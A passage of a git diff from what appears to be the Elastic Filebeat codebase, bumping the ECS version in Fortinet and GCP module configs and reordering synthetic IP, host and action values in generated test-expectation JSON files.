"abor1370.www.domain" ], "related.ip": [ - "10.77.78.180", - "10.97.236.123" + "10.97.236.123", + "10.77.78.180" ], "related.user": [ "nisi" @@ -4536,8 +4536,8 @@ "venia2079.mail.example" ], "related.ip": [ - "10.5.11.205", - "10.65.144.51" + "10.65.144.51", + "10.5.11.205" ], "related.user": [ "uptat" @@ -4660,8 +4660,8 @@ "gelitsed3249.corp" ], "related.ip": [ - "10.138.210.116", - "10.225.255.211" + "10.225.255.211", + "10.138.210.116" ], "related.user": [ "fugiatn" @@ -4722,8 +4722,8 @@ "dolor7082.internal.localhost" ], "related.ip": [ - "10.219.1.151", - "10.250.81.189" + "10.250.81.189", + "10.219.1.151" ], "related.user": [ "ori" @@ -4783,8 +4783,8 @@ "totam6886.api.localhost" ], "related.ip": [ - "10.54.23.133", - "10.76.125.70" + "10.76.125.70", + "10.54.23.133" ], "related.user": [ "oloreeu" @@ -4968,8 +4968,8 @@ "edq5397.www.test" ], "related.ip": [ - "10.221.206.74", - "10.73.28.165" + "10.73.28.165", + "10.221.206.74" ], "related.user": [ "quas" @@ -5278,8 +5278,8 @@ "enbyCi3813.api.domain" ], "related.ip": [ - "10.164.120.197", - "10.164.207.42" + "10.164.207.42", + "10.164.120.197" ], "related.user": [ "pta" @@ -5401,8 +5401,8 @@ "isn3991.local" ], "related.ip": [ - "10.103.189.199", - "10.29.120.226" + "10.29.120.226", + "10.103.189.199" ], "related.user": [ "emu" @@ -5462,8 +5462,8 @@ "iumtotam1010.www5.corp" ], "related.ip": [ - "10.210.153.7", - "10.133.254.23" + "10.133.254.23", + "10.210.153.7" ], "related.user": [ "voluptas" @@ -5524,8 +5524,8 @@ "onsecte91.www5.localdomain" ], "related.ip": [ - "10.91.2.135", - "10.126.245.73" + "10.126.245.73", + "10.91.2.135" ], "related.user": [ "olore" @@ -5586,8 +5586,8 @@ "abori7686.internal.host" ], "related.ip": [ - "10.183.243.246", - "10.137.85.123" + "10.137.85.123", + "10.183.243.246" ], "related.user": [ "cid" @@ -5648,8 +5648,8 @@ "reprehen3513.test" ], "related.ip": [ - "10.61.225.196", - "10.10.86.55" + "10.10.86.55", + "10.61.225.196" ], "related.user": [ "eniamqu" @@ -5896,8 +5896,8 @@ "olores7881.local" ], "related.ip": [ - "10.87.144.208", - "10.143.53.214" + "10.143.53.214", + "10.87.144.208" ], "related.user": [ "psumq" @@ -5958,8 +5958,8 @@ "tDuis3281.www5.localdomain" ], "related.ip": [ - "10.105.97.134", - "10.204.178.19" + "10.204.178.19", + "10.105.97.134" ], "related.user": [ "mexercit" @@ -6020,8 +6020,8 @@ "uptasnul2751.www5.corp" ], "related.ip": [ - "10.161.64.168", - "10.194.67.223" + "10.194.67.223", + "10.161.64.168" ], "related.user": [ "tion" @@ -6081,8 +6081,8 @@ "upt6017.api.localdomain" ], "related.ip": [ - "10.100.154.220", - "10.120.148.241" + "10.120.148.241", + "10.100.154.220" ], "related.user": [ "rsitam" @@ -6143,8 +6143,8 @@ "tpers2217.internal.lan" ], "related.ip": [ - "10.116.153.19", - "10.180.90.112" + "10.180.90.112", + "10.116.153.19" ], "related.user": [ "itessequ" diff --git a/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml b/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml index 61f503d7f99..f83d8bfe67d 100644 --- a/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml +++ b/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml @@ -28,7 +28,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 {{ if .external_interfaces }} - add_fields: diff --git a/x-pack/filebeat/module/fortinet/fortimail/config/input.yml b/x-pack/filebeat/module/fortinet/fortimail/config/input.yml index b4ae86db1ff..8bbe81b5f46 100644 --- a/x-pack/filebeat/module/fortinet/fortimail/config/input.yml +++ b/x-pack/filebeat/module/fortinet/fortimail/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/fortinet/fortimail/test/generated.log-expected.json b/x-pack/filebeat/module/fortinet/fortimail/test/generated.log-expected.json index bbc0d867dd2..ebb3d607be5 100644 --- a/x-pack/filebeat/module/fortinet/fortimail/test/generated.log-expected.json +++ b/x-pack/filebeat/module/fortinet/fortimail/test/generated.log-expected.json @@ -1262,12 +1262,12 @@ "observer.type": "Firewall", "observer.vendor": "Fortinet", "related.hosts": [ - "estl5804.internal.local", - "atise3421.www5.localdomain" + "atise3421.www5.localdomain", + "estl5804.internal.local" ], "related.ip": [ - "10.179.210.218", - "10.73.207.70" + "10.73.207.70", + "10.179.210.218" ], "rsa.email.email_dst": "rumSecti", "rsa.email.email_src": "taut", @@ -2680,8 +2680,8 @@ "observer.type": "Firewall", "observer.vendor": "Fortinet", "related.hosts": [ - "mveni5084.internal.local", - "taevit4968.mail.local" + "taevit4968.mail.local", + "mveni5084.internal.local" ], "related.ip": [ "10.62.61.1", @@ -3135,8 +3135,8 @@ "modi6930.internal.test" ], "related.ip": [ - "10.60.164.100", - "10.161.1.146" + "10.161.1.146", + "10.60.164.100" ], "rsa.email.email_dst": "nproiden", "rsa.email.email_src": "etconse", @@ -3235,12 +3235,12 @@ "observer.type": "Firewall", "observer.vendor": "Fortinet", "related.hosts": [ - "uradip7802.mail.example", - "tetura7106.www5.corp" + "tetura7106.www5.corp", + "uradip7802.mail.example" ], "related.ip": [ - "10.93.239.216", - "10.44.35.57" + "10.44.35.57", + "10.93.239.216" ], "rsa.email.email_dst": "ciun", "rsa.email.email_src": "vento", diff --git a/x-pack/filebeat/module/fortinet/fortimanager/config/input.yml b/x-pack/filebeat/module/fortinet/fortimanager/config/input.yml index ff232c9266e..656a9b63cde 100644 --- a/x-pack/filebeat/module/fortinet/fortimanager/config/input.yml +++ b/x-pack/filebeat/module/fortinet/fortimanager/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/fortinet/fortimanager/test/generated.log-expected.json b/x-pack/filebeat/module/fortinet/fortimanager/test/generated.log-expected.json index da3536a339d..50a83d1ed28 100644 --- a/x-pack/filebeat/module/fortinet/fortimanager/test/generated.log-expected.json +++ b/x-pack/filebeat/module/fortinet/fortimanager/test/generated.log-expected.json @@ -28,9 +28,9 @@ "modtempo" ], "related.ip": [ + "10.189.58.145", "10.20.234.169", - "10.44.173.44", - "10.189.58.145" + "10.44.173.44" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -99,8 +99,8 @@ "aer445.host" ], "related.ip": [ - "10.171.204.166", - "10.62.4.246" + "10.62.4.246", + "10.171.204.166" ], "related.user": [ "oluptas" @@ -110,8 +110,8 @@ "rsa.investigations.event_vcat": "eius", "rsa.misc.OS": "anonnu", "rsa.misc.action": [ - "mol", - "accept" + "accept", + "mol" ], "rsa.misc.category": "exe", "rsa.misc.client": "radip", @@ -188,9 +188,9 @@ "ccaecat" ], "related.ip": [ + "10.200.188.142", "10.15.159.80", - "10.94.103.117", - "10.200.188.142" + "10.94.103.117" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -255,9 +255,9 @@ "lorem" ], "related.ip": [ + "10.27.88.95", "10.131.233.27", - "10.50.112.141", - "10.27.88.95" + "10.50.112.141" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -322,13 +322,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.5670", "related.hosts": [ - "ntutl", "roinBCSe", + "ntutl", "olo7148.mail.home" ], "related.ip": [ - "10.157.213.15", - "10.87.212.179" + "10.87.212.179", + "10.157.213.15" ], "related.user": [ "rveli" @@ -338,8 +338,8 @@ "rsa.investigations.event_vcat": "aveniam", "rsa.misc.OS": "oll", "rsa.misc.action": [ - "allow", - "ali" + "ali", + "allow" ], "rsa.misc.category": "emeumfug", "rsa.misc.client": "caecatc", @@ -420,8 +420,8 @@ "agna7678.internal.host" ], "related.ip": [ - "10.76.73.140", - "10.114.150.67" + "10.114.150.67", + "10.76.73.140" ], "related.user": [ "aperia" @@ -513,8 +513,8 @@ "equep5085.mail.domain" ], "related.ip": [ - "10.195.36.51", - "10.95.64.124" + "10.95.64.124", + "10.195.36.51" ], "related.user": [ "nnum" @@ -777,8 +777,8 @@ "rsa.investigations.event_vcat": "tDuisaut", "rsa.misc.OS": "Nequepor", "rsa.misc.action": [ - "sno", - "deny" + "deny", + "sno" ], "rsa.misc.category": "idolo", "rsa.misc.client": "volu", @@ -855,9 +855,9 @@ "diconseq" ], "related.ip": [ - "10.58.214.16", + "10.238.164.74", "10.106.162.153", - "10.238.164.74" + "10.58.214.16" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -923,8 +923,8 @@ ], "related.ip": [ "10.225.141.20", - "10.217.150.196", - "10.110.31.190" + "10.110.31.190", + "10.217.150.196" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -1082,8 +1082,8 @@ "onsecte" ], "related.ip": [ - "10.30.47.165", "10.25.212.118", + "10.30.47.165", "10.5.235.217" ], "rsa.internal.messageid": "generic_fortinetmgr_1", @@ -1148,13 +1148,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.225", "related.hosts": [ - "equaturv", "tvolu", + "equaturv", "ccaeca5504.internal.example" ], "related.ip": [ - "10.40.152.253", - "10.149.13.76" + "10.149.13.76", + "10.40.152.253" ], "related.user": [ "tetur" @@ -1242,9 +1242,9 @@ "xea" ], "related.ip": [ - "10.98.194.212", "10.233.120.207", - "10.51.213.42" + "10.51.213.42", + "10.98.194.212" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -1309,8 +1309,8 @@ "tla" ], "related.ip": [ - "10.67.132.242", "10.245.187.229", + "10.67.132.242", "10.241.132.176" ], "rsa.internal.messageid": "generic_fortinetmgr_1", @@ -1375,8 +1375,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.1847", "related.hosts": [ - "uii", "cingel", + "uii", "tore7088.www.invalid" ], "related.ip": [ @@ -1561,13 +1561,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.4450", "related.hosts": [ - "saquaea", "billoi", + "saquaea", "eturad6143.www.home" ], "related.ip": [ - "10.95.117.134", - "10.128.46.70" + "10.128.46.70", + "10.95.117.134" ], "related.user": [ "enim" @@ -1577,8 +1577,8 @@ "rsa.investigations.event_vcat": "boNem", "rsa.misc.OS": "ntium", "rsa.misc.action": [ - "acommodi", - "block" + "block", + "acommodi" ], "rsa.misc.category": "inrepreh", "rsa.misc.client": "moles", @@ -1659,8 +1659,8 @@ "orinrep5386.www.corp" ], "related.ip": [ - "10.253.228.140", - "10.208.21.135" + "10.208.21.135", + "10.253.228.140" ], "related.user": [ "inculp" @@ -1747,13 +1747,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.1710", "related.hosts": [ - "edquia", "Nemo", + "edquia", "henderi724.www5.home" ], "related.ip": [ - "10.3.23.172", - "10.243.226.122" + "10.243.226.122", + "10.3.23.172" ], "related.user": [ "olorem" @@ -1845,8 +1845,8 @@ "reseosqu1629.mail.lan" ], "related.ip": [ - "10.94.242.80", - "10.106.85.174" + "10.106.85.174", + "10.94.242.80" ], "related.user": [ "lmo" @@ -1856,8 +1856,8 @@ "rsa.investigations.event_vcat": "snostrum", "rsa.misc.OS": "tiaecon", "rsa.misc.action": [ - "cancel", - "atiset" + "atiset", + "cancel" ], "rsa.misc.category": "ehende", "rsa.misc.client": "umquam", @@ -1935,9 +1935,9 @@ "oluptat" ], "related.ip": [ - "10.247.53.179", "10.117.63.181", - "10.168.20.20" + "10.168.20.20", + "10.247.53.179" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -2002,13 +2002,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.2208", "related.hosts": [ - "duntut", "lamcola", + "duntut", "tasnul4179.internal.host" ], "related.ip": [ - "10.141.156.217", - "10.53.168.187" + "10.53.168.187", + "10.141.156.217" ], "related.user": [ "amqu" @@ -2018,8 +2018,8 @@ "rsa.investigations.event_vcat": "illumq", "rsa.misc.OS": "idata", "rsa.misc.action": [ - "block", - "emacc" + "emacc", + "block" ], "rsa.misc.category": "ueporro", "rsa.misc.client": "veli", @@ -2096,8 +2096,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.3402", "related.hosts": [ - "imavenia", "tur", + "imavenia", "bore5546.www.local" ], "related.ip": [ @@ -2189,13 +2189,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.91", "related.hosts": [ - "Dui", "amquisno", + "Dui", "Utenima260.mail.invalid" ], "related.ip": [ - "10.151.170.207", - "10.181.183.104" + "10.181.183.104", + "10.151.170.207" ], "related.user": [ "iosamni" @@ -2205,8 +2205,8 @@ "rsa.investigations.event_vcat": "eturadip", "rsa.misc.OS": "onsecte", "rsa.misc.action": [ - "amni", - "cancel" + "cancel", + "amni" ], "rsa.misc.category": "umdolore", "rsa.misc.client": "modoc", @@ -2282,8 +2282,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.7278", "related.hosts": [ - "liquaUte", "ectetura", + "liquaUte", "uido2046.mail.lan" ], "related.ip": [ @@ -2298,8 +2298,8 @@ "rsa.investigations.event_vcat": "uatu", "rsa.misc.OS": "tnulapar", "rsa.misc.action": [ - "odic", - "deny" + "deny", + "odic" ], "rsa.misc.category": "deri", "rsa.misc.client": "scivelit", @@ -2377,8 +2377,8 @@ ], "related.ip": [ "10.37.161.101", - "10.111.182.212", - "10.17.209.252" + "10.17.209.252", + "10.111.182.212" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -2444,8 +2444,8 @@ ], "related.ip": [ "10.153.166.133", - "10.170.196.181", - "10.158.175.98" + "10.158.175.98", + "10.170.196.181" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -2509,8 +2509,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.5978", "related.hosts": [ - "tuser", "porissu", + "tuser", "con6049.internal.lan" ], "related.ip": [ @@ -2670,9 +2670,9 @@ "ons" ], "related.ip": [ + "10.36.99.207", "10.166.142.198", - "10.225.37.73", - "10.36.99.207" + "10.225.37.73" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -2737,9 +2737,9 @@ "eturadip" ], "related.ip": [ - "10.66.90.225", "10.145.194.12", - "10.214.156.161" + "10.214.156.161", + "10.66.90.225" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -2804,9 +2804,9 @@ "iutal" ], "related.ip": [ - "10.156.208.5", + "10.163.36.101", "10.6.242.108", - "10.163.36.101" + "10.156.208.5" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -2870,13 +2870,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.4713", "related.hosts": [ - "epteurs", "data", + "epteurs", "remeum2641.www5.corp" ], "related.ip": [ - "10.68.233.163", - "10.220.148.127" + "10.220.148.127", + "10.68.233.163" ], "related.user": [ "estiaec" @@ -2886,8 +2886,8 @@ "rsa.investigations.event_vcat": "olore", "rsa.misc.OS": "tatem", "rsa.misc.action": [ - "itanimi", - "allow" + "allow", + "itanimi" ], "rsa.misc.category": "psa", "rsa.misc.client": "ugits", @@ -3057,13 +3057,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.4442", "related.hosts": [ - "fugi", "uae", + "fugi", "mea6298.api.example" ], "related.ip": [ - "10.113.152.241", - "10.115.121.243" + "10.115.121.243", + "10.113.152.241" ], "related.user": [ "norumetM" @@ -3073,8 +3073,8 @@ "rsa.investigations.event_vcat": "teirured", "rsa.misc.OS": "oloremi", "rsa.misc.action": [ - "cancel", - "ali" + "ali", + "cancel" ], "rsa.misc.category": "idolor", "rsa.misc.client": "imveni", @@ -3155,8 +3155,8 @@ "iqu7510.internal.corp" ], "related.ip": [ - "10.179.153.97", - "10.49.82.45" + "10.49.82.45", + "10.179.153.97" ], "related.user": [ "dictasun" @@ -3166,8 +3166,8 @@ "rsa.investigations.event_vcat": "tatemse", "rsa.misc.OS": "eturadi", "rsa.misc.action": [ - "ade", - "accept" + "accept", + "ade" ], "rsa.misc.category": "laboreet", "rsa.misc.client": "ano", @@ -3245,8 +3245,8 @@ ], "related.ip": [ "10.99.55.115", - "10.205.83.138", - "10.98.52.184" + "10.98.52.184", + "10.205.83.138" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -3311,9 +3311,9 @@ "reprehe" ], "related.ip": [ - "10.90.189.248", "10.197.128.162", - "10.228.11.50" + "10.228.11.50", + "10.90.189.248" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -3424,8 +3424,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.7318", "related.hosts": [ - "ptat", "umdol", + "ptat", "deFinibu3940.internal.lan" ], "related.ip": [ @@ -3745,9 +3745,9 @@ "usantiu" ], "related.ip": [ - "10.118.111.183", + "10.140.59.161", "10.5.67.140", - "10.140.59.161" + "10.118.111.183" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -3811,13 +3811,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.4493", "related.hosts": [ - "veleumiu", "labor", + "veleumiu", "nimadmi4084.api.home" ], "related.ip": [ - "10.28.212.191", - "10.7.70.169" + "10.7.70.169", + "10.28.212.191" ], "related.user": [ "itsed" @@ -3827,8 +3827,8 @@ "rsa.investigations.event_vcat": "Loremips", "rsa.misc.OS": "eritquii", "rsa.misc.action": [ - "nostru", - "accept" + "accept", + "nostru" ], "rsa.misc.category": "amnisiu", "rsa.misc.client": "rcita", @@ -3920,8 +3920,8 @@ "rsa.investigations.event_vcat": "uep", "rsa.misc.OS": "iatisund", "rsa.misc.action": [ - "block", - "nvo" + "nvo", + "block" ], "rsa.misc.category": "tenima", "rsa.misc.client": "iuntNe", @@ -3999,8 +3999,8 @@ ], "related.ip": [ "10.22.149.132", - "10.251.183.113", - "10.217.145.137" + "10.217.145.137", + "10.251.183.113" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -4065,8 +4065,8 @@ "nisi" ], "related.ip": [ - "10.183.16.252", "10.51.60.203", + "10.183.16.252", "10.203.66.175" ], "rsa.internal.messageid": "generic_fortinetmgr_1", @@ -4131,13 +4131,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.409", "related.hosts": [ - "magnama", "doei", + "magnama", "ursint411.www.lan" ], "related.ip": [ - "10.157.14.165", - "10.61.200.105" + "10.61.200.105", + "10.157.14.165" ], "related.user": [ "nimadmi" @@ -4224,13 +4224,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.5475", "related.hosts": [ - "rcita", "antium", + "rcita", "ididunt7607.mail.localhost" ], "related.ip": [ - "10.217.111.77", - "10.242.178.15" + "10.242.178.15", + "10.217.111.77" ], "related.user": [ "nimadmin" @@ -4240,8 +4240,8 @@ "rsa.investigations.event_vcat": "psaqu", "rsa.misc.OS": "nevolu", "rsa.misc.action": [ - "datatno", - "allow" + "allow", + "datatno" ], "rsa.misc.category": "ionu", "rsa.misc.client": "ugiatn", @@ -4317,8 +4317,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.142", "related.hosts": [ - "ommodoco", "rsita", + "ommodoco", "mco2906.domain" ], "related.ip": [ @@ -4333,8 +4333,8 @@ "rsa.investigations.event_vcat": "ora", "rsa.misc.OS": "ommod", "rsa.misc.action": [ - "cancel", - "ant" + "ant", + "cancel" ], "rsa.misc.category": "rehende", "rsa.misc.client": "rehe", @@ -4415,8 +4415,8 @@ "ntex5135.corp" ], "related.ip": [ - "10.239.194.105", - "10.234.171.117" + "10.234.171.117", + "10.239.194.105" ], "related.user": [ "tat" @@ -4571,8 +4571,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.6905", "related.hosts": [ - "rveli", "aaliq", + "rveli", "tat1845.internal.invalid" ], "related.ip": [ @@ -4587,8 +4587,8 @@ "rsa.investigations.event_vcat": "agnaaliq", "rsa.misc.OS": "itte", "rsa.misc.action": [ - "allow", - "Sedut" + "Sedut", + "allow" ], "rsa.misc.category": "aqueip", "rsa.misc.client": "serr", @@ -4664,13 +4664,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.1353", "related.hosts": [ - "nibusB", "iatn", + "nibusB", "ulamc767.internal.lan" ], "related.ip": [ - "10.112.155.228", - "10.47.191.95" + "10.47.191.95", + "10.112.155.228" ], "related.user": [ "aed" @@ -4825,9 +4825,9 @@ "litsedq" ], "related.ip": [ - "10.90.229.92", "10.251.212.166", - "10.77.105.160" + "10.77.105.160", + "10.90.229.92" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -4907,8 +4907,8 @@ "rsa.investigations.event_vcat": "animi", "rsa.misc.OS": "tisunde", "rsa.misc.action": [ - "aut", - "cancel" + "cancel", + "aut" ], "rsa.misc.category": "lamcorpo", "rsa.misc.client": "com", @@ -4984,8 +4984,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.491", "related.hosts": [ - "edutpe", "boru", + "edutpe", "istenatu3686.invalid" ], "related.ip": [ @@ -5145,8 +5145,8 @@ "llumdo" ], "related.ip": [ - "10.239.231.168", "10.242.119.111", + "10.239.231.168", "10.188.131.18" ], "rsa.internal.messageid": "generic_fortinetmgr_1", @@ -5216,8 +5216,8 @@ "tru3812.mail.lan" ], "related.ip": [ - "10.247.124.74", - "10.106.101.87" + "10.106.101.87", + "10.247.124.74" ], "related.user": [ "ainci" @@ -5444,8 +5444,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.6452", "related.hosts": [ - "cons", "tem", + "cons", "mdolo7008.api.corp" ], "related.ip": [ @@ -5460,8 +5460,8 @@ "rsa.investigations.event_vcat": "adol", "rsa.misc.OS": "ita", "rsa.misc.action": [ - "accept", - "uptat" + "uptat", + "accept" ], "rsa.misc.category": "uidexea", "rsa.misc.client": "orpori", @@ -5605,8 +5605,8 @@ "caecatcu" ], "related.ip": [ - "10.249.93.150", "10.154.151.111", + "10.249.93.150", "10.7.230.206" ], "rsa.internal.messageid": "generic_fortinetmgr_1", @@ -5671,13 +5671,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.5718", "related.hosts": [ - "quirat", "ptatem", + "quirat", "itse5466.api.example" ], "related.ip": [ - "10.217.209.221", - "10.26.4.3" + "10.26.4.3", + "10.217.209.221" ], "related.user": [ "ciduntut" @@ -5687,8 +5687,8 @@ "rsa.investigations.event_vcat": "santiumd", "rsa.misc.OS": "oris", "rsa.misc.action": [ - "rsitame", - "deny" + "deny", + "rsitame" ], "rsa.misc.category": "agnaal", "rsa.misc.client": "urmagn", @@ -5857,13 +5857,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.2052", "related.hosts": [ - "dat", "asp", + "dat", "amco1592.mail.host" ], "related.ip": [ - "10.62.140.108", - "10.110.99.222" + "10.110.99.222", + "10.62.140.108" ], "related.user": [ "moenimi" @@ -5873,8 +5873,8 @@ "rsa.investigations.event_vcat": "atvolupt", "rsa.misc.OS": "riosam", "rsa.misc.action": [ - "deny", - "ssitasp" + "ssitasp", + "deny" ], "rsa.misc.category": "enimadmi", "rsa.misc.client": "uatDui", @@ -5966,8 +5966,8 @@ "rsa.investigations.event_vcat": "cupidata", "rsa.misc.OS": "ficiade", "rsa.misc.action": [ - "lorem", - "accept" + "accept", + "lorem" ], "rsa.misc.category": "iac", "rsa.misc.client": "tlabo", @@ -6044,9 +6044,9 @@ "eleumiu" ], "related.ip": [ - "10.236.211.111", + "10.120.212.78", "10.221.100.157", - "10.120.212.78" + "10.236.211.111" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -6110,13 +6110,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.3052", "related.hosts": [ - "xeacom", "tenima", + "xeacom", "pidatatn2627.www.localdomain" ], "related.ip": [ - "10.210.82.202", - "10.208.231.15" + "10.208.231.15", + "10.210.82.202" ], "related.user": [ "riatur" @@ -6204,9 +6204,9 @@ "nimides" ], "related.ip": [ - "10.123.59.69", + "10.53.251.202", "10.226.255.3", - "10.53.251.202" + "10.123.59.69" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -6271,9 +6271,9 @@ "edut" ], "related.ip": [ - "10.29.141.252", + "10.3.85.176", "10.212.56.26", - "10.3.85.176" + "10.29.141.252" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -6353,8 +6353,8 @@ "rsa.investigations.event_vcat": "ill", "rsa.misc.OS": "eabill", "rsa.misc.action": [ - "atemqui", - "cancel" + "cancel", + "atemqui" ], "rsa.misc.category": "idatatno", "rsa.misc.client": "res", @@ -6498,8 +6498,8 @@ "datatno" ], "related.ip": [ - "10.74.88.209", "10.238.49.73", + "10.74.88.209", "10.92.3.166" ], "rsa.internal.messageid": "generic_fortinetmgr_1", @@ -6565,9 +6565,9 @@ "ptate" ], "related.ip": [ - "10.119.248.36", + "10.187.107.47", "10.84.200.121", - "10.187.107.47" + "10.119.248.36" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -6703,8 +6703,8 @@ "rspic5637.api.local" ], "related.ip": [ - "10.115.166.48", - "10.169.133.219" + "10.169.133.219", + "10.115.166.48" ], "related.user": [ "emq" @@ -6791,8 +6791,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.4195", "related.hosts": [ - "Except", "aconse", + "Except", "rror3870.www5.local" ], "related.ip": [ @@ -6807,8 +6807,8 @@ "rsa.investigations.event_vcat": "ntexp", "rsa.misc.OS": "aconseq", "rsa.misc.action": [ - "block", - "oluptate" + "oluptate", + "block" ], "rsa.misc.category": "edqu", "rsa.misc.client": "ites", @@ -6952,9 +6952,9 @@ "oeius" ], "related.ip": [ + "10.233.128.7", "10.66.149.234", - "10.186.253.240", - "10.233.128.7" + "10.186.253.240" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -7019,9 +7019,9 @@ "irat" ], "related.ip": [ + "10.227.133.134", "10.46.11.114", - "10.173.140.201", - "10.227.133.134" + "10.173.140.201" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -7087,8 +7087,8 @@ ], "related.ip": [ "10.170.236.123", - "10.69.130.207", - "10.205.18.11" + "10.205.18.11", + "10.69.130.207" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -7157,8 +7157,8 @@ "velill3821.mail.invalid" ], "related.ip": [ - "10.124.34.251", - "10.97.254.192" + "10.97.254.192", + "10.124.34.251" ], "related.user": [ "epor" @@ -7168,8 +7168,8 @@ "rsa.investigations.event_vcat": "lica", "rsa.misc.OS": "taedi", "rsa.misc.action": [ - "deny", - "imide" + "imide", + "deny" ], "rsa.misc.category": "iurere", "rsa.misc.client": "ollitan", @@ -7360,9 +7360,9 @@ "uipex" ], "related.ip": [ - "10.212.208.70", + "10.35.84.125", "10.37.120.29", - "10.35.84.125" + "10.212.208.70" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -7428,8 +7428,8 @@ ], "related.ip": [ "10.143.65.84", - "10.207.207.106", - "10.199.201.26" + "10.199.201.26", + "10.207.207.106" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -7644,8 +7644,8 @@ "rsa.investigations.event_vcat": "lupt", "rsa.misc.OS": "etdolo", "rsa.misc.action": [ - "amnihilm", - "allow" + "allow", + "amnihilm" ], "rsa.misc.category": "ntin", "rsa.misc.client": "xcep", @@ -7721,8 +7721,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.2314", "related.hosts": [ - "umtotam", "stenat", + "umtotam", "unt2122.internal.local" ], "related.ip": [ @@ -7819,8 +7819,8 @@ "luptat2613.internal.localhost" ], "related.ip": [ - "10.182.124.88", - "10.139.144.75" + "10.139.144.75", + "10.182.124.88" ], "related.user": [ "modo" @@ -7830,8 +7830,8 @@ "rsa.investigations.event_vcat": "tfug", "rsa.misc.OS": "imipsam", "rsa.misc.action": [ - "block", - "utodi" + "utodi", + "block" ], "rsa.misc.category": "cid", "rsa.misc.client": "mquaerat", @@ -7912,8 +7912,8 @@ "neavo4796.internal.domain" ], "related.ip": [ - "10.35.10.19", - "10.188.124.185" + "10.188.124.185", + "10.35.10.19" ], "related.user": [ "dolo" diff --git a/x-pack/filebeat/module/gcp/audit/config/input.yml b/x-pack/filebeat/module/gcp/audit/config/input.yml index b1ba0148832..4945e01447b 100644 --- a/x-pack/filebeat/module/gcp/audit/config/input.yml +++ b/x-pack/filebeat/module/gcp/audit/config/input.yml @@ -34,4 +34,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log-expected.json b/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log-expected.json index 8b4b2ed642d..d7e057c466a 100644 --- a/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log-expected.json +++ b/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log-expected.json @@ -80,6 +80,7 @@ ], "user.email": "xxx@xxx.xxx", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 